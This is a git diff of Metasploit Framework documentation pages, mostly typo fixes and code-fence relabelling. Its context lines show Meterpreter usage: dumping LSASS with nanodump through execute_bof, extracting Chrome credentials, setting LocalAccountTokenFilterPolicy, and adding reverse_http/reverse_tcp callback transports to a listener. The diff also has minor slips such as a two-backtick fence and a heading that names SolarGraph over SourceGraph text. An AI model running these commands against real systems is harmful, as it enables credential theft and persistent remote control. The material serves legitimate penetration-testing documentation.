@@ -208,7 +208,7 @@ Note the important bit here: **you do not need commit rights to Rapid7 to branch

 Back to PR #1217. Turns out, my change was enough to land the original chunk of work. So, someone else ([@jlee-r7](https://github.com/jlee-r7)) was able to to do something like this:

-````
+```
 $ git fetch upstream
 remote: Counting objects: 12, done.
 remote: Compressing objects: 100% (2/2), done.
@@ -216,31 +216,31 @@ remote: Total 7 (delta 5), reused 7 (delta 5)
 Unpacking objects: 100% (7/7), done.
 From https://github.com/rapid7/metasploit-framework
   9e499e5..263e967  refs/pull/1651/head -> upstream/pr/1651
-````
+```

 This all looked good, so he could land this to Rapid7's repo with:

-````
+``
 $ git checkout -b upstream-master --track upstream/master
 $ git merge -S --no-ff --edit landing-1217
 $ git push upstream upstream-master:master
-````
+``

 Or, if he already have upstream-master checked out:

-````
+```
 $ git checkout upstream-master
 $ git rebase upstream/master
 $ git merge -S --no-ff --edit landing-1217
 $ git push upstream upstream-master:master
-````
+```

 The `--edit` is optional if we have our editor configured correctly in `$HOME/.gitconfig`. The point here is that we *always* want a merge commit, and we *never* want to use the (often useless) default merge commit message. For #1217, this was changed to:

-````commit
+```
 Land #1217, java payload build system refactor

-````
+```

 Note that you should rebase *before* landing -- otherwise, your merge commit will be lost in the rebase.

@@ -248,7 +248,7 @@ Finally, the -S indicates we are going to sign the merge, using our GPG key. Thi

 To set yourself up for signing, your .gitconfig (or metasploit-framework/git/.config) file should have these entries:

-````
+```ini
 [user]
 name = Your Name
 email = your@email.xxx
@@ -256,7 +256,7 @@ signingkey = DEADBEEF # Must match exactly with your key for "Your Name <your@em
 [alias]
 c = commit -S --edit
 m = merge -S --no-ff --edit
-````
+```

 People with commit rights to rapid7/metasploit-framework will have their [[keys listed here|./Committer-Keys.md]].

@@ -271,10 +271,6 @@ Release note examples:

 The [rn-no-release-notes](https://github.com/rapid7/metasploit-framework/issues?utf8=%E2%9C%93&q=label%3Arn-no-release-notes+) label must be added if there are no release notes for the merged pull request.

-# Cross-linking PRs, Bugs, and Commits
-
-TODO: Update in this new post-Redmine, GitHub issues world
-
 # Merge conflicts

 The nice thing about this strategy is that you can test for merge conflicts straight away. You'd use a sequence like:
@@ -16,7 +16,7 @@ If listeners are externalized, then there is an API layer both for interactive i

 ### Integration of native tool-chains

-Tools like Veil, pwnlib, etc. have for a long time used native compilers and tooling to build payloads and evasions. Metasploit has opted mostly for native Ruby solutions, though it does have some implicit runtime dependencies like `apktool` for Android payload injection. However, these tools are getting harder to maintain and use (e.g. metasm has a diffcult time building any non-trivial C code, we just spent a month fixing a bug it had with Ruby 2.5 and Windows). It would be nice to have either be able to depend on a set of first-class toolchains being available in the environment, or have some way to package them natively with Metasploit itself. A full suite of compilers and tools does consume considerable amounts of space (e.g. mettle's toolchain is 1.8GB uncompressed), but this is probably less of a problem than it was 15 years ago.
+Tools like Veil, pwnlib, etc. have for a long time used native compilers and tooling to build payloads and evasions. Metasploit has opted mostly for native Ruby solutions, though it does have some implicit runtime dependencies like `apktool` for Android payload injection. However, these tools are getting harder to maintain and use (e.g. metasm has a difficult time building any non-trivial C code, we just spent a month fixing a bug it had with Ruby 2.5 and Windows). It would be nice to have either be able to depend on a set of first-class toolchains being available in the environment, or have some way to package them natively with Metasploit itself. A full suite of compilers and tools does consume considerable amounts of space (e.g. mettle's toolchain is 1.8GB uncompressed), but this is probably less of a problem than it was 15 years ago.

 ### Native first-class UUID-aware, async stager payload

@@ -26,7 +26,7 @@ Make a new async payload type (based on pingback payload work) making secure com

 ### Overhaul network targeting

-Setting at least 5 variables RHOSTS/RPORT/SSL/VHOST/SSL_Version/User/Pass/etc... to target a single web application is very cumbersome. When these variables also do not apply to multiple RHOSTS exactly, the scheme of multiple variables falls apart futher. Metasploit should be able to target URLs directly, that can all have their own independent ports, users, hostnames, etc:
+Setting at least 5 variables RHOSTS/RPORT/SSL/VHOST/SSL_Version/User/Pass/etc... to target a single web application is very cumbersome. When these variables also do not apply to multiple RHOSTS exactly, the scheme of multiple variables falls apart further. Metasploit should be able to target URLs directly, that can all have their own independent ports, users, hostnames, etc:

 ```
 set TARGETS https://user:password@target_app:4343 https://target_app2
@@ -73,7 +73,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_ALL_OBJECT_CATEGORY` - Dump all objects containing any objectCategory field.
 - `ENUM_ALL_OBJECT_CLASS` - Dump all objects containing any objectClass field.
 - `ENUM_COMPUTERS` - Dump all objects containing an objectCategory or objectClass of Computer.
- `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow contrained delegation.
+- `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow constrained delegation.
 - `ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
 - `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries.
 - `ENUM_DOMAIN` - Dump info about the Active Directory domain.
@@ -89,7 +89,7 @@ This module has a selection of inbuilt queries which can be configured via the `
 - `ENUM_MACHINE_ACCOUNT_QUOTA` - Dump the number of computer accounts a user is allowed to create in a domain.
 - `ENUM_ORGROLES` - Dump info about all known organization roles in the LDAP environment.
 - `ENUM_ORGUNITS` - Dump info about all known organizational units in the LDAP environment.
- `ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow uncontrained delegation.
+- `ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow unconstrained delegation.
 - `ENUM_USER_ACCOUNT_DISABLED` - Dump info about disabled user accounts.
 - `ENUM_USER_ACCOUNT_LOCKED_OUT` - Dump info about locked out user accounts.
 - `ENUM_USER_ASREP_ROASTABLE` - Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.
@@ -23,7 +23,7 @@ Matching Modules

 There are two ways to launch a Post module, both require an existing session.

-Within a msf prompt you can use the `use` comand followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:
+Within a msf prompt you can use the `use` command followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:

 ```msf
 msf6 > use post/windows/gather/enum_chrome
@@ -4,7 +4,7 @@ SMB (Server Message Blocks), is a way for sharing files across nodes on a networ

 There are two main ports for SMB:

- 139/TCP - Initially Microsoft implemented SMB ontop of their existing NetBIOS network architecture, which allowed for Windows computers to communicate across the same network
+- 139/TCP - Initially Microsoft implemented SMB on top of their existing NetBIOS network architecture, which allowed for Windows computers to communicate across the same network
 - 445/TCP - Newer versions of SMB use this port, were NetBIOS is not used.

 Other terminology to be aware of:
@@ -10,7 +10,7 @@ Meterpreter even when running on the Windows platform.
 crashes, the Meterpreter session will die. It is suggested that users invoke this functionality through a dedicated
 session to avoid losing access altogether.

-The loader and execution environment are provided by [trustedsec/COFFLoader][3]. The extension is therefor subject to
+The loader and execution environment are provided by [trustedsec/COFFLoader][3]. The extension is therefore subject to
 the same limitations.

 The following functions are unavailable:
@@ -33,8 +33,6 @@ The `bofloader` extension provides exactly one command, through which all of the

 `execute_bof </path/to/bof_file> [Options] -- [BOF Arguments]`

-
-
 * `-c` / `--compile` -- Compile the input file (requires mingw).
 * `-e` / `--entry` -- The entry point (default: `go`).
 * `-f` / `--format-string` -- Argument format-string. See details below.
@@ -79,7 +77,7 @@ argument format string.
 # Usage Examples
 Executing [dir][4], passing the path argument and number of sub-directories to list.

-```
+```msf
 meterpreter > execute_bof CS-Situational-Awareness-BOF/SA/dir/dir.x64.o --format-string Zs C:\\ 0
 Contents of C:\*:
 	08/05/2022 15:17           <dir> $Recycle.Bin
@@ -103,7 +101,7 @@ meterpreter >
 Executing [nanodump][5]. First the PID of LSASS is found, then the argument string is constructed. The output must be
 written to disk. Once completed, the dump file can be downloaded from the remote host.

-```
+```msf
 meterpreter > ps lsass
 Filtering on 'lsass'

@@ -32,7 +32,7 @@ Each value also has an associated type, for example:

 All of these examples assume you are in a Meterpreter session. To see the latest help information run `help reg`:

-```
+```msf
 meterpreter > help reg
 Usage: reg [command] [options]
 Interact with the target machine's registry.
@@ -44,7 +44,7 @@ Interact with the target machine's registry.

 Registry keys must be escaped correctly. Window's registry keys are escaped with backslashes. In msfconsole backslashes and spaces have a special meaning - which means you will need to escape these characters for your key to work as expected.

-```
+```msf
 # Valid: Using single quotes around the registry key
 meterpreter > reg enumkey -k 'HKCU\Keyboard Layout'

@@ -75,7 +75,7 @@ Active sessions

 For example - when interacting with a x86 session there are 12 keys listed:

-```
+```msf
 # x86 Session
 meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
 Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
@@ -86,7 +86,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

 Versus a x64 session which shows 23 keys:

-```
+```msf
 # x64 Session
 meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
 Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
@@ -98,7 +98,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

 If this is problematic either [[upgrade your session to Meterpreter|./Metasploit-Guide-Upgrading-Shells-to-Meterpreter.md]], or specify the `-w` flag which will impact the result of queries:

-```
+```msf
 meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' -w 32
 Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

@@ -106,7 +106,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
  # ... omitted for clarity ...
 ```

-```
+```msf
 meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' -w 64
 Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

@@ -119,7 +119,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

 Enumerate a root key:

-```
+```msf
 meterpreter > reg enumkey -k HKLM
 Enumerating: HKLM

@@ -135,7 +135,7 @@ Enumerating: HKLM

 Enumerate a subkey:

-```
+```msf
 meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run'
 Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

@@ -149,7 +149,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

 Display the registry value and type information:

-```
+```msf
 meterpreter > reg queryval -k 'HKLM\Software\Microsoft\Windows NT\CurrentVersion' -v ProductName
 Key: HKLM\Software\Microsoft\Windows NT\CurrentVersion
 Name: ProductName
@@ -159,7 +159,7 @@ Data: Windows 10 Enterprise

 Values that are of type `REG_SZ_EXPAND` such as ` %SystemRoot%\system32\drivers\GM.DLS` will not automatically be expanded:

-```
+```msf
 meterpreter > reg queryval -k 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic' -v 'GMFilePath'
 Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic
 Name: GMFilePath
@@ -169,7 +169,7 @@ Data: C:\Windows\system32\drivers\GM.DLS

 Values that are of type `REG_MULTI_SZ` will be separated by `\0`:

-```
+```msf
 meterpreter > reg queryval -k 'HKLM\Software\example' -v 'example multi value with spaces'
 Key: HKLM\Software\example
 Name: example multi value with spaces
@@ -179,7 +179,7 @@ Data: line1\0line2\0line3

 ### Creating a key

-```
+```msf
 meterpreter > reg createkey -k 'HKLM\software\example'
 Successfully created key: HKLM\software\example
 ```
@@ -188,42 +188,42 @@ Successfully created key: HKLM\software\example

 Setting a `REG_DWORD` - use a decimal value:

-```
+```msf
 meterpreter > reg setval -k 'HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\system' -v LocalAccountTokenFilterPolicy -t REG_DWORD -d 1
 Successfully set LocalAccountTokenFilterPolicy of REG_DWORD.
 ```

 Setting a `REG_QWORD` - use a decimal value:

-```
+```msf
 meterpreter > reg setval -k 'HKLM\Software\example' -t REG_DWORD -v qword_example -d 12345678
 Successfully set example multi value with spaces of REG_MULTI_SZ.
 ```

 Setting `REG_MULTI_SZ` - i.e. an array of strings:

-```
+```msf
 meterpreter > reg setval -k 'HKLM\Software\example' -t REG_MULTI_SZ -v 'example multi value with spaces' -d 'line1\0line2\0line3'
 Successfully set example multi value with spaces of REG_MULTI_SZ.
 ```

 Setting `REG_BINARY` - use lowercase hexadecimal input without the preceding `0x`:

-```
+```msf
 meterpreter > reg setval -k 'HKLM\Software\example' -t REG_BINARY -v binary_example -d deadbeef
 Successfully set binary_example of REG_BINARY.
 ```

 ### Deleting a key

-```
+```msf
 meterpreter > reg deletekey -k 'HKLM\software\example'
 Successfully deleted key: HKLM\software\example
 ```

 ### Deleting a value

-```
+```msf
 meterpreter > reg deleteval -k 'HKLM\software\example' -v 'example multi value with spaces'
 Successfully deleted example multi value with spaces.
 ```
@@ -2,7 +2,7 @@ Of the many recent changes to Meterpreter, reliable network communication is one

 In the case of HTTP/S transports, some resiliency features were present. Thanks to its stateless nature, HTTP/S transports would continue to attempt to talk to Metasploit after network outages or other unexpected problems as each command request/response is transmitted over a fresh connection. TCP based transports had nothing that would attempt to reconnect should some kind of network issue occur.

-Revamped [[transport|./Meterpreter-Transport-Control.md]] implementations have provided support for resiliency even for TCP based communcations. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.
+Revamped [[transport|./Meterpreter-Transport-Control.md]] implementations have provided support for resiliency even for TCP based communications. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.

 It is also possible to control the behaviour of this functionality a little via the use of the various timeout values that can be specified when adding transports to the session, and also on the fly for the current transport. For full details, please see the [[timeout documentation|./Meterpreter-Timeout-Control.md]] for details on those timeout values.

@@ -16,7 +16,7 @@ During this dormant period, no socket is active, no requests are made, and no re

 The interface to the sleep command looks like this:

-```
+```msf
 meterpreter > sleep
 Usage: sleep <time>

@@ -27,11 +27,11 @@ Usage: sleep <time>
  shut down and restarted after the designated timeout.
 ```

-As shown, `sleep` expects to be given a single postive integer value that represents the number of seconds that Meterpreter should be silent for. When run, the session will close, and then callback after the elapsed period of time. Given that Meterpreter lives in memory, this lack of communication will make it extremely difficult to track.
+As shown, `sleep` expects to be given a single positive integer value that represents the number of seconds that Meterpreter should be silent for. When run, the session will close, and then callback after the elapsed period of time. Given that Meterpreter lives in memory, this lack of communication will make it extremely difficult to track.

 The following shows a sample run where Meterpreter is put to sleep for 20 seconds, after which the session reconnects while the handler is still in background:

-```
+```msf
 meterpreter > sleep 20
 [*] Telling the target instance to sleep for 20 seconds ...
 [+] Target instance has gone to sleep, terminating current session.
@@ -57,7 +57,7 @@ The data or time cost of uploading `metsrv`, `stdapi` and `priv` for every singl
 
 It's hard to believe it possible, but in this case the following image could be considered a nightmare.

-```
+```msf
 [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx
 [*] Meterpreter session 4684 opened ....
 [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx
@@ -95,7 +95,7 @@ With this shellcode stub wired into the DOS header, Metasploit adds the entire b
 1. Loads the extension DLL into memory.
 1. Calculates the size of the DLL.
 1. Writes the size of the DLL as a 32-bit value to the configuration block.
-1. Writes the entire body of the DLL, as-is, to the end of the conifiguration block.
+1. Writes the entire body of the DLL, as-is, to the end of the configuration block.
 
 Once the end of the list of extensions is reached, the last thing that is written to the payload buffer is a 32-bit representation of `0` (`NULL`) which indicates that the list of extensions has been terminated. This `NULL` value is what `metsrv` will look for when iterating through the list of extensions so that it knows when to stop. After this, any extension initialisation scripts are wired in (though that's beyond the scope of this article).
 
@@ -150,4 +150,4 @@ Congratulations, you're dancing with stageless Meterpreter!
 
 At this point, all of the pre-loaded extensions have been loaded into Meterpreter and are available for use. However, Metasploit is yet to know about them. To initiate client-site wiring of any of the pre-loaded extensions, the user can just type `use <extension>` just like they used to. Metasploit will check to see if the extension already exists in the target instance, and if it does, it will skip the extension upload and just wire-up the functions on the client side. If the extension is missing, then it will upload it and wire-up the functions on the fly just like it always has done.
 
-If you're working with `meterpreter_reverse_https`, you'll notice that when new shells come in they appear just like an orphaned instance. This is expected behaviour, because a stageless session can't and won't look any different to an old session that hasn't been in touch with Metasploit for a while.
+If you're working with `meterpreter_reverse_https`, you'll notice that when new shells come in they appear just like an orphaned instance. This is expected behaviour, because a stageless session can't and won't look any different to an old session that hasn't been in touch with Metasploit for a while.
@@ -28,13 +28,13 @@ In the case of `HTTP/S` payloads it's slightly different because the protocols a

 With `TCP` transports, communication "times out" when the time between the last packet and the current socket poll is greater than the communications timeout value. This happens when there are network related issues that prevent data from being transmitted between the two endpoints, but doesn't cause the socket to completely disconnect. With `HTTP/S` transports, the communication "times out" for the same reason, but the evaluation of the condition is slightly different in that failure can occur because there is either no response at all from the remote server, or the response to a `GET` request results in no acknowledgement.

-By default, this value is set to `300` seconds (`5` minutes), but can be overidden by the user via the `SessionCommunicationTimeout` setting.
+By default, this value is set to `300` seconds (`5` minutes), but can be overridden by the user via the `SessionCommunicationTimeout` setting.

 If connectivity fails, or the communication is deemed to have timed out. Then the current transport is destroyed, and the next transport in the list of transports is invoked. From there, Meterpreter will use the Retry Total and Retry Wait values while attempting to re-establish a session with Metasploit.

 #### Retry Total and Retry Wait

-After a transport initialises inside Meterpreter, Meterpreter uses this transport to attempt to establish a new session with Metasploit. In some cases, Metasploit might not be availalble due to reasons like bad network connectivity, or a lack of configured listeners. If Meterpreter can't connect to Metasploit, it will attempt to retry for a period of time. Once that period of time expires, Meterpreter will deem this transport "dead" and will move to the next one in the transport list.
+After a transport initialises inside Meterpreter, Meterpreter uses this transport to attempt to establish a new session with Metasploit. In some cases, Metasploit might not be available due to reasons like bad network connectivity, or a lack of configured listeners. If Meterpreter can't connect to Metasploit, it will attempt to retry for a period of time. Once that period of time expires, Meterpreter will deem this transport "dead" and will move to the next one in the transport list.

 The total amount of time that Meterpreter will attempt to connect back to Metasploit on the given transport is indicated by the `retry total` value. That is, `retry total` is the total amount of time that Meterpreter will retry communication on the transport. The default value is `3600` seconds (`1` hour), and can be overridden via the `SessionRetryTotal` setting.

@@ -44,7 +44,7 @@ While the current time is within the `retry total` time, Meterpreter will consta

 Meterpreter supports the querying and updating of each of these timeouts via the console. In order to get the current timeout settings, users can invoke the `get_timeouts` command, which returns all four of the current timeout settings (one for the global session, and three for the transport-specific settings). An example of which is shown below:

-```
+```msf
 meterpreter > get_timeouts 
 Session Expiry  : @ 2015-06-09 19:56:05
 Comm Timeout    : 100000 seconds
@@ -56,7 +56,7 @@ The `Session Expiry` value is rendered as an absolute local time so that the use

 In order to update these values, users can invoke the `set_timeouts` command. Invoking it without parameters shows the help:

-```
+```msf
 meterpreter > set_timeouts 
 Usage: set_timeouts [options]

@@ -69,7 +69,7 @@ OPTIONS:
    -h        Help menu
    -t <opt>  Retry total time (seconds)
    -w <opt>  Retry wait time (seconds)
-    -x <opt>  Expiration timout (seconds)
+    -x <opt>  Expiration timeout (seconds)
 ```
 As the help implies, each of these settings takes a value that indicates the number of seconds. Each of the options of this command are optional, so the user can update only those values that they are interested in updating. When the command is invoked, Meterpreter is updated, and the result shows the updated values once the changes have been made.

@@ -77,7 +77,7 @@ In the case of the `-x` parameter, the value that is to be passed in should repr

 The following example updates the session expiration timeout to be `2` minutes from "now", and changes the retry wait time to `3` seconds:

-```
+```msf
 meterpreter > set_timeouts -x 120 -t 3
 Session Expiry  : @ 2015-06-02 22:45:13
 Comm Timeout    : 100000 seconds
@@ -86,7 +86,7 @@ Retry Wait Time : 2500 seconds
 ```

 This command can be invoked any number of times while the session is valid, but as soon as the session has expired, Metepreter will shut down and it's game over:
-```
+```msf
 meterpreter > 
 [*] 10.1.10.35 - Meterpreter session 2 closed.  Reason: Died
 ```
@@ -26,7 +26,7 @@ Meterpreter has a new base command called `transport`. This is the hub of all tr

 The following output shows the current help text for the `transport` command:

-```bash
+```msf
 meterpreter > transport
 Usage: transport <list|change|add|next|prev|remove> [options]

@@ -48,7 +48,7 @@ OPTIONS:
    -T <opt>  Retry total time (seconds) (default: same as current session)
    -U <opt>  Proxy username for HTTP/S transports (optional)
    -W <opt>  Retry wait time (seconds) (default: same as current session)
-    -X <opt>  Expiration timout (seconds) (default: same as current session)
+    -X <opt>  Expiration timeout (seconds) (default: same as current session)
    -c <opt>  SSL certificate path for https transport verification (optional)
    -h        Help menu
    -i <opt>  Specify transport by index (currently supported: remove)
@@ -65,7 +65,7 @@ OPTIONS:

 The simplest of all the sub-commands in the `transport` set is `list`. This command shows the full list of currently enabled transport, and an indicator of which one is the "current" transport. The following shows the non-verbose output with just the default transport running:

-```bash
+```msf
 meterpreter > transport list
 Session Expiry  : @ 2015-06-09 19:56:05

@@ -82,7 +82,7 @@ The above output shows that we have one transport enabled that is using `TCP`. W

 The verbose version of this command shows more detail about the transport, but only in cases where extra detail is available (such as `reverse_http/s`). The following command shows the output of the `list` sub-command with the verbose flag (`-v`) after an `HTTP` transport has been added:

-```bash
+```msf
 meterpreter > transport list -v
 Session Expiry  : @ 2015-06-09 19:56:05

@@ -98,7 +98,7 @@ Adding transports gives Meterpreter the ability to work on different transport m

 The following command shows a simple example that adds a `reverse_http` transport to an existing Meterpreter session. It specifies a custom communications timeout, retry total and retry wait, and also specifies a custom user-agent string to be used for the HTTP requests:

-```bash
+```msf
 meterpreter > transport add -t reverse_http -l 10.1.10.40 -p 5105 -T 50000 -W 2500 -C 100000 -A "Totes-Legit Browser/1.1"
 [*] Adding new transport ...
 [+] Successfully added reverse_http transport.
@@ -127,7 +127,7 @@ It is also possible to specify the following:

 The following shows another example which adds another `reverse_tcp` transport to the transport list:

-```bash
+```msf
 meterpreter > transport add -t reverse_tcp -l 10.1.10.40 -p 5005
 [*] Adding new transport ...
 [+] Successfully added reverse_tcp transport.
@@ -155,7 +155,7 @@ The three different ways to change transports are:

 As an example, here is the current transport setup:

-```bash
+```msf
 meterpreter > transport list
 Session Expiry  : @ 2015-06-09 19:56:05

@@ -168,7 +168,7 @@ Session Expiry  : @ 2015-06-09 19:56:05

 Moving to the next transport:

-```bash
+```msf
 meterpreter > transport next
 [*] Changing to next transport ...
 [+] Successfully changed to the next transport, killing current session.
@@ -195,7 +195,7 @@ This output shows that we moved from the original `reverse_tcp` to the `reverse_

 Moving to the next transport again takes the session to the second `reverse_tcp` listener:

-```bash
+```msf
 meterpreter > transport next
 [*] Changing to next transport ...
 [+] Successfully changed to the next transport, killing current session.
@@ -218,7 +218,7 @@ Session Expiry  : @ 2015-06-09 19:56:06

 From here, moving backward sends Meterpreter back to the `reverse_http` listener:

-```bash
+```msf
 meterpreter > transport prev
 [*] Changing to previous transport ...

@@ -252,7 +252,7 @@ The command is similar to `add` in that it takes a subset of the parameters, and
 * `-p` - The `LPORT` value.
 * `-u` - This value is only required for `reverse_http/s` transports and needs to contain the URI of the transport in question. This is important because there might be multiple listeners on the same IP and port, so the URI is what differentiates each of the sessions.

-```bash
+```msf
 [*] Starting interaction with 2...

 meterpreter > transport list
@@ -282,7 +282,7 @@ Previously, Meterpreter only had built-in resiliency in the `HTTP/S` payloads an

 The following shows Metasploit being closed and leaving the existing `TCP` session running behind the scenes:

-```bash
+```msf
 meterpreter > transport list
 Session Expiry  : @ 2015-06-09 19:56:05

@@ -301,7 +301,7 @@ With Metasploit closed, the Meterpreter session has detected that the transport

 The following output shows Metasploit being re-launched with the appropriate listeners, and the existing Meterpreter instance establishing a session automatically:

-```bash
+```msf
 ./msfconsole -r ~/msf.rc
 [*] Starting the Metasploit Framework console...|
 IIIIII    dTb.dTb        _.---._
@@ -63,7 +63,7 @@ Related open tickets (slightly broader than Meterpreter):

 * PrependTokenSteal / PrependEnvironmentSteal: Basically with proxies and other perimeter defenses being SYSTEM doesn't work well. This would be an addition to a payload that would work to execute as SYSTEM but would then locate a logged in user and steal their environment to call back to the handler. Very useful when pivoting around with PSEXEC
 * Binary installed death dates: A way putting a date in a binary where after that date the binary no longer functions would be useful and possibly even perform self-deletion. Time zones would be a tricky matter, but is something handled by many programmers already (probably just not in shellcode)
- * Allow Meterpreter sesssions to resolve L3 addresses (#4793)
+ * Allow Meterpreter sessions to resolve L3 addresses (#4793)
 * Track whether or not the current session has admin credentials (#4633)d
 * Support Metasploit-side zlib compression of sessions
 * Being able to use Meterpreter instances to easily forward commands & exfil
@@ -49,7 +49,7 @@ If you go to `metasploit-framework/documentation/modules`, you'll see that there

 For example:

-```
+```msf
 msf> use auxiliary/scanner/smb/smb_login
 msf (smb_login)> info

@@ -1,9 +1,9 @@
+# Overview
 One of the most important things to learn when first working with Metasploit is how to navigate Metasploit's codebase. However, its often not immediately clear how this should be done. This page aims to explain some of the different approaches that one can take when navigating Metasploit's codebase and provides a primer for learning how Metasploit's codebase is structured.

 A quick reminder before we get started, but one can always access the Metasploit Slack at <https://metasploit.slack.com/>. Normally this page should allow you to sign up, however if for any reason you cannot, feel free to shoot an email to msfdev *at* rapid7 *dot* com and we will be happy to send you an invite link.

-Metasploit Code Structure
------------------------
+# Metasploit Code Structure
 A great outline of Metasploit's code structure can be found at <https://www.offensive-security.com/metasploit-unleashed/metasploit-architecture/>, which should be referred to for an overview of Metasploit's code structure. To repeat what is said there there are the following main subdirectories:

 * **data** - Our general data storage area. Used to store wordlists for use by modules, binaries that are used by exploits, images, and more.
@@ -23,25 +23,136 @@ A great outline of Metasploit's code structure can be found at <https://www.offe
 * **scripts** - Stores various scripts used within Metasploit, such as Meterpreter, and scripts for the console interface of Metasploit Framework.
 * **spec** - Contains various RSpec checks that are used to ensure libraries and core functionality within the framework are working as expected. If you are writing a new library or adjusting one, you may need to update the corresponding RSpec file within this directory to ensure the specification checks are updated to reflect the new behavior.
 * **test** - Contains tests for various parts of Metasploit code to ensure they are operating as expected.
-* **tools** - Contains various tools that may be helpful under different situations. The `dev` directory contains tools useful during development, such as `tools/dev/msftidy_docs.rb` which helps ensure your documentation is in line with standards.
+* **tools** - Contains various tools that may be helpful under different situations. The `dev` directory contains tools useful during development, such as `tools/dev/msftidy_docs.rb` which helps ensure your documentation is in line with standards.~~

+# Code Navigation Tools

-GitHub Code Navigation
------------------------
+## GitHub Code Navigation
 You can search through the code of Metasploit using GitHub with searches such as <https://github.com/rapid7/metasploit-framework/search?l=Ruby&q=%22payload.arch%22&type=code>. Note that double quotes are required to match specifically on a certain term; in the previous example this term was `payload.arch`. You can also set the `type=code` parameter to specifically match only on code results, however this can be set to `commits` or `issues` if you want to search commits or issues instead. Finally notice that when searching code, its important to also specify the language of the files you want to match. In the case above I made it so that my results would only match on files deemed by GitHub to contain Ruby code, however you can also specify other languages such as Batch, or C if you want those languages instead. You can even remove the language restriction if you find your search results are too narrow.

 Another incredibly useful feature of GitHub is the ability to search across all repositories that an organization owns. This is especially useful in Metasploit as certain components, such as Rex code and payload code, may be contained in repositories other than `metasploit-framework`. To search across the public repositories that Rapid7 owns, use a search such as <https://github.com/search?q=org%3Arapid7+%22payload.arch%22&type=code>. Note the presence of the `org:rapid7` tag within the previous URL: this tells GitHub to look through all repositories that Rapid7 owns for the term `payload.arch` within any code files.

 Experiment with these results and play around with GitHub searches more. Over time you will learn where it is useful and where it has its limitations and will be able to determine when it might be better to use an IDE to help understand a piece of code more.

-IDE Code Navigation
------------------------
+## SolarGraph Code Navigation
+A better way to navigate code, particularly across repos, and also find out where things are defined using an easy to use interface, is SourceGraph from
+<https://sourcegraph.com>. The interface is not hard to use and you can find several tutorials over at <https://docs.sourcegraph.com/tutorials> on how to use it.
+
+The main benefit of SourceGraph over GitHub is the ability to search all known repositories at once and then easily jump between definitions using either the
+online search at <https://sourcegraph.com/search>, or the GitHub integrated browser plugin from <https://docs.sourcegraph.com/integration/browser_extension> to allow
+easy navigation of Metasploit and Rapid7 code from your GitHub PR reviews.
+
+It is also recommended to review the tutorials and better understand some of the advanced search capabilities of SourceGraph as they do provide some useful search
+functionality that is not available or may be harder to perform with GitHub.
+
+# IDE Code Navigation
+
+## RubyMine Code Navigation
 One of the best ways to navigate the codebase within Metasploit is to use RubyMine, available from <https://www.jetbrains.com/ruby/>. Whilst it is a paid tool, it offers a variety of neat referencing finding features such as the ability to right click on a method name and select `Find Usages`, or to right click the method name and select `Go To -> Declaration or Usages` to find all the locations where that method might of been defined within the codebase, which can make tracing complex definitions that wind between library and module code much easier. RubyMine also offers autocompletion and integrates well with many tools such as Git to allow you to quickly switch branches and RuboCop to help provide suggestions on where your code style could be improved.

 For a cheaper option one can also use VS Code. Note however that VS Code does not have the best autotab completion and will not allow you to trace references, however if your willing to put up with this, it is a much faster and more lightweight product than RubyMine, which makes it great for those times when you just need to edit a piece of code without loading a bunch of related files that you don't need to reference or edit. It also has great regex search features that work much faster than RubyMine, allowing you to search for items within the codebase a lot quicker than you can with RubyMine, which will often seem to stutter at times due to its larger overhead.

 Ultimately though the tool that you pick should be up to you. Some may prefer to work with vim/nano/emacs or some other command line editor over a GUI interface. Use whatever you can afford and feels comfortable to you!

-Pry Debugging
------------------------
-Occasionally, simply reading through Metasploit code may not be helpful. You need to actually get into the weeds and learn what a piece of code is doing. In these cases, it may be helpful to use `pry`, a Ruby Debugger that can be launched at a specific place within your code and which allows you to view the state of the program at that time, make adjustments as needed, and then either step through the program or continue to let it run. A full tutorial on Pry will not be provided here, instead readers are encouraged to read up on the various guides on Pry available online, such as <https://learn.co/lessons/debugging-with-pry>
+## SolarGraph Code Navigation - VSCode
+We'd be remiss to not mention SolarGraph as a potential plugin that one can use to navigate code within VSCode. This tool
+provides a lot of the autocomplete and IntelliSense functionality you might get from dedicated IDEs such as RubyMine, within
